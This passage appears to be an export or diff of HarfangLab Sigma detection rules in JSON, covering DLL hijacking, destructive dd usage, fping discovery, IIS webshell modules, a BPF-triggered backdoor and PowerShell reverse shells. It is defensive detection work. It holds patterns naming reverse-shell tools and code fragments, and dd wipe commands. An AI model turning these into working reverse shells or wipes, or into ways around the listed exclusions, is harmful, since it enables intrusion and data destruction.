false, + "rule_level_override": null, + "rule_id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e", + "rule_name": "DLL Hijacking via 
systempropertiesremote.exe", + "rule_description": "Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2650626f-6d1c-4193-b47e-4a0e51549c76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-24T07:14:08.475670Z", + "creation_date": "2026-03-23T11:45:34.624029Z", + "enabled": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:34.624033Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://man7.org/linux/man-pages/man1/dd.1.html", + "https://attack.mitre.org/techniques/T1485/", + "https://attack.mitre.org/techniques/T1027/001/" + ], + "name": "t1485_suspicious_dd_usage_linux.yml", + "content": "title: Suspicious Usage of dd (Linux)\nid: 2650626f-6d1c-4193-b47e-4a0e51549c76\ndescription: |\n Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\n This could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\n It can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\n It is recommended to analyze the process calling dd to look for other malicious actions or content.\nreferences:\n - https://man7.org/linux/man-pages/man1/dd.1.html\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1027/001/\ndate: 2021/09/24\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1027.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Dd\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n # /usr/bin/dd\n # /usr/lib/klibc/bin/dd\n Image|endswith: '/dd'\n CommandLine|contains:\n - 'if=/dev/zero'\n - 'if=/dev/random'\n - 'if=/dev/urandom'\n ParentImage|contains: '?'\n\n exclusion_commandline:\n CommandLine|contains:\n - ' status=progress'\n - ' conv='\n\n exclusion_initfs:\n CommandLine|contains: 'of=/var/tmp/mkinitramfs_*/.random-seed'\n\n exclusion_cron:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_apt:\n Ancestors|contains: '|/usr/bin/apt|'\n\n 
exclusion_dpkg:\n Ancestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_apt-compat:\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n ParentCommandLine: '/bin/sh /etc/cron.daily/apt-compat'\n\n exclusion_cron_hourly:\n ParentCommandLine|startswith: '/bin/sh /etc/cron.hourly/'\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n\n exclusion_filebeat:\n ParentCommandLine: '/bin/bash */config/filebeat-* test'\n\n exclusion_yocto_sdk:\n Image: '/opt/yocto/*/usr/bin/dd'\n\n exclusion_cronapt:\n - ParentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n - GrandparentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n\n exclusion_netflow:\n CommandLine: 'dd bs=18 count=1 if=/dev/urandom'\n ParentCommandLine: '/bin/bash -ue .command.run'\n\n exclusion_leapp:\n - ParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/leapp '\n - '/usr/bin/python2 /usr/bin/leapp '\n - '/usr/libexec/platform-python /bin/leapp '\n - '/usr/libexec/platform-python /usr/bin/leapp '\n - CurrentDirectory|startswith: '/usr/share/leapp-repository/repositories/system_upgrade/common/actors/'\n\n exclusion_rust:\n GrandparentCommandLine|endswith: '/.rustup/toolchains/stable-x86_64-unknown-linux*/bin/cargo'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_commvault:\n - Ancestors|contains: '|/opt/commvault/Base64/cvflock|'\n - CommandLine: 'dd if=/dev/urandom bs=1 count=32'\n ParentCommandLine|startswith:\n - '/bin/sh /opt/commvault/Base/Galaxy '\n - '/bin/sh /opt/commvault?/Base/Galaxy '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2650626f-6d1c-4193-b47e-4a0e51549c76", + "rule_name": "Suspicious Usage of dd (Linux)", + "rule_description": "Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\nThis could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\nIt can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\nIt is recommended to analyze the process calling dd to look for other malicious actions or content.\n", + "rule_creation_date": "2021-09-24", + "rule_modified_date": "2026-03-23", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + 
"attack.defense_evasion", + "attack.impact" + ], + "rule_technique_tags": [ + "attack.t1027.001", + "attack.t1485" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "268199bf-94d2-43fe-aa0c-677157a424c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.612240Z", + "creation_date": "2026-03-23T11:45:34.612244Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612252Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://www.kali.org/tools/fping/", + "https://attack.mitre.org/techniques/T1018/" + ], + "name": "t1018_fping.yml", + "content": "title: Fping Execution\nid: 268199bf-94d2-43fe-aa0c-677157a424c0\ndescription: |\n Detects the execution of fping, a ping-like tool that uses the Internet Control Message Protocol (ICMP) to discover active devices within a network.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate other actions taken by this user in their session.\nreferences:\n - https://www.kali.org/tools/fping/\n - https://attack.mitre.org/techniques/T1018/\ndate: 
2022/12/23\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Fping\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/fping'\n ParentImage|contains: '?'\n\n exclusion_zabbix:\n - ParentImage: '/usr/sbin/zabbix_server'\n - GrandparentImage:\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_proxy'\n - '/usr/sbin/zabbix_server_mysql'\n - '/usr/sbin/zabbix_server_pgsql'\n - '/usr/sbin/zabbix_proxy_mysql'\n - '/usr/sbin/zabbix_proxy_pgsql'\n - ParentCommandLine:\n - 'sh -c /usr/bin/fping -C3 -i0 2>&1 &1 |]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n LibraryType: 'Native'\n AgentVersion|gte|version: 4.3 # Starting this version, managed/native DLL are both considered and are not detected the same way. 
See 0ae4376f-360f-4b97-9b3f-4c735a82fbf6 for previous variant.\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmap.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - 
'?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 
'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_textcontrol:\n ImageLoaded: '?:\\inetpub\\wwwroot\\bin\\tx??_*.dll'\n Company: 'Text Control GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\n# level: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "29dfc6e6-c42a-4009-8e21-367675f7e417", + "rule_name": "Suspicious IIS Module Loaded", + "rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n", + "rule_creation_date": "2025-01-28", + "rule_modified_date": "2026-01-06", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1505.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"2a006be4-b10c-4a12-ab2f-98057371169c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.620176Z", + "creation_date": "2026-03-23T11:45:34.620178Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.620182Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://nikhilh-20.github.io/blog/cbpf_bpfdoor/", + "https://github.com/gwillgues/BPFDoor", + "https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware", + "https://attack.mitre.org/techniques/T1205/001/" + ], + "name": "t1205_001_possible_cbpf_covert_backdoor.yml", + "content": "title: Possible Classic BPF Triggered Covert Backdoor\nid: 2a006be4-b10c-4a12-ab2f-98057371169c\ndescription: |\n Detects Classic BPF program loaded with instructions commonly used by malwares.\n Threat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\n Because Classic BPF executes inside the kernel, it lets 
malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\n Attackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\n Finally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\n It is recommended to check the process which loaded the Classic BPF program for suspicious activities.\nreferences:\n - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\n - https://nikhilh-20.github.io/blog/cbpf_bpfdoor/\n - https://github.com/gwillgues/BPFDoor\n - https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware\n - https://attack.mitre.org/techniques/T1205/001/\ndate: 2025/08/11\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.001\n - attack.t1205.002\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'cbpf_load'\n BpfDump|contains|all:\n # ldh [0xc] : Get the \"EtherType\" field at offset 0xc\n - '280000000c000000'\n # jeq 0x800, ??? : if EtherType == IPv4 (0x800), jump\n - '15000????0080000'\n # ldh [0x14] : Get the \"Fragment Offset\" of the IPv4 header\n # jset 0x1fff, ?? 
: Compare the Fragment Offset value with 0x1fff\n - '2800000014000000450?????ff1f0000'\n # ldb [0x17] : Get the protocol field at offset 0x17 in the IPv4 header\n - '3000000017000000'\n # ldxb 4*([14]&0xf) : Loads a byte from offset 14 and perform various operations\n # to get the total size of the IPv4 header\n - 'b10000000e000000'\n InstructionCount|gte: 15\n\n exclusion_networking_tools:\n Image:\n # tcpdump\n - '/usr/bin/tcpdump'\n - '/usr/sbin/tcpdump'\n - '/usr/local/bin/tcpdump'\n - '/usr/bin/dumpcap'\n # nmap\n - '/usr/local/bin/nmap'\n - '/opt/domotz/bin/domotz_nmap'\n - '/usr/lib/nmap/nmap'\n # openvas\n - '*/sbin/openvas'\n - '*/sbin/openvassd'\n - '/opt/detect/sbin/openvassd'\n # dhclient\n - '/sbin/dhclient'\n - '/usr/sbin/dhclient'\n - '/usr/local/dhcp_probe/bin/dhcp_probe'\n # nessusd\n - '/opt/nessus/sbin/nessusd'\n # vdcm\n - '/opt/vdcm/libexec/DCM_IO'\n # dhcp\n - '/usr/sbin/kea-dhcp4'\n - '/opt/kea/sbin/kea-dhcp4'\n - '/usr/sbin/dhcpd'\n # radsniff\n - '/usr/bin/radsniff'\n # dns\n - '*/bin/dnstop'\n # tracerout\n - '/usr/bin/tcptraceroute.mt'\n # port-knock server  \n - '*/sbin/knockd'\n\n exclusion_containers:\n ProcessAncestors|contains:\n - '/bin/containerd-shim'\n - '|/usr/bin/lxc-start'\n\n exclusion_security_tools:\n Image:\n - '/opt/endpoint-agent/agent' # Sekoia\n - '/usr/share/auditbeat/bin/auditbeat'\n - '/usr/bin/suricata'\n\n exclusion_fingerbank:\n Image : '/usr/local/fingerbank/collector/fingerbank-collector'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2a006be4-b10c-4a12-ab2f-98057371169c", + "rule_name": "Possible Classic BPF Triggered Covert Backdoor", + "rule_description": "Detects Classic BPF program loaded with instructions commonly used by malwares.\nThreat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake 
up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\nBecause Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\nAttackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\nFinally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\nIt is recommended to check the process which loaded the Classic BPF program for suspicious activities.\n", + "rule_creation_date": "2025-08-11", + "rule_modified_date": "2026-01-22", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1205.001", + "attack.t1205.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:35.296703Z", + "creation_date": "2026-03-23T11:45:35.296705Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.296710Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1", + "https://github.com/besimorhino/powercat", + "https://github.com/antonioCoco/ConPtyShell", + "https://attack.mitre.org/techniques/T1059/001/" + ], + "name": "t1059_001_reverse_shell_powershell.yml", + "content": "title: PowerShell Reverse Shell Executed\nid: 2a2ab0d4-c555-4e90-b3f0-e8025296440a\ndescription: |\n Detects suspicious reverse shell execution via PowerShell.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\nreferences:\n - https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1\n - https://github.com/besimorhino/powercat\n - https://github.com/antonioCoco/ConPtyShell\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/07/01\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command1:\n PowershellCommand|contains|all:\n - 'Net.Sockets.TCPClient'\n - '.GetStream('\n - '.Read('\n - '.GetString('\n\n selection_command2:\n # https://podalirius.net/fr/reverse-shells/windows-reverse-shells-cheatsheet/\n 
PowershellCommand|contains|all:\n - 'New-Object -TypeName System.Text.ASCIIEncoding).GetString('\n - '(pwd).Path'\n - '([Text.Encoding]::ASCII).GetBytes('\n\n selection_cmdlet:\n PowershellCommand|contains:\n # https://github.com/besimorhino/powercat\n - 'powercat '\n # https://github.com/antonioCoco/ConPtyShell\n - 'Invoke-ConPtyShell '\n\n exclusion_bmc:\n ProcessParentCommandLine: '?:\\Program Files\\BMC Software\\BladeLogic\\RSCD\\/RSCD.exe'\n PowershellCommand|contains|all:\n - 'Opening the socket from $sourceIP'\n - 'tConnected !'\n\n exclusion_defender:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_{????????-????-????-????-????????????}.ps1'\n PowershellCommand|contains:\n - '[void]$socket.ConnectAsync($RemoteIP, $RemotePort).Wait(200)'\n - '$TcpSocket = New-Object Net.Sockets.TcpClient -ErrorAction SilentlyContinue'\n - '$SslStream = New-Object Net.Security.SslStream $TcpClient.GetStream()'\n - '$ProtocolNames= @(\"ssl2\",\"ssl3\",\"tls\",\"tls11\",\"tls12\")'\n\n exclusion_icinga:\n - PowershellScriptPath: '?:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\cache\\framework_cache.psm1'\n - ProcessParentImage: '?:\\Program Files\\ICINGA2\\sbin\\icinga2.exe'\n - PowershellCommand|contains|all:\n - 'https://github.com/Icinga/icinga-powershell-framework'\n - 'function Get-IcingaDirectorSelfServiceConfig()'\n\n exclusion_opsramp:\n PowershellScriptPath|startswith: '?:\\Program Files (x86)\\OpsRamp\\Agent\\'\n\n exclusion_lpar2rrd:\n PowershellCommand|contains|all:\n - '## lpar2rrd-agent.ps1'\n - '# implementation notes for daemon on lpar2rrd server side'\n\n exclusion_synology_backup:\n # $b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"\n # Command sent to the backup server to test the connection.\n - PowershellCommand|contains: '$b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"'\n - ProcessCommandLine|contains:\n - 
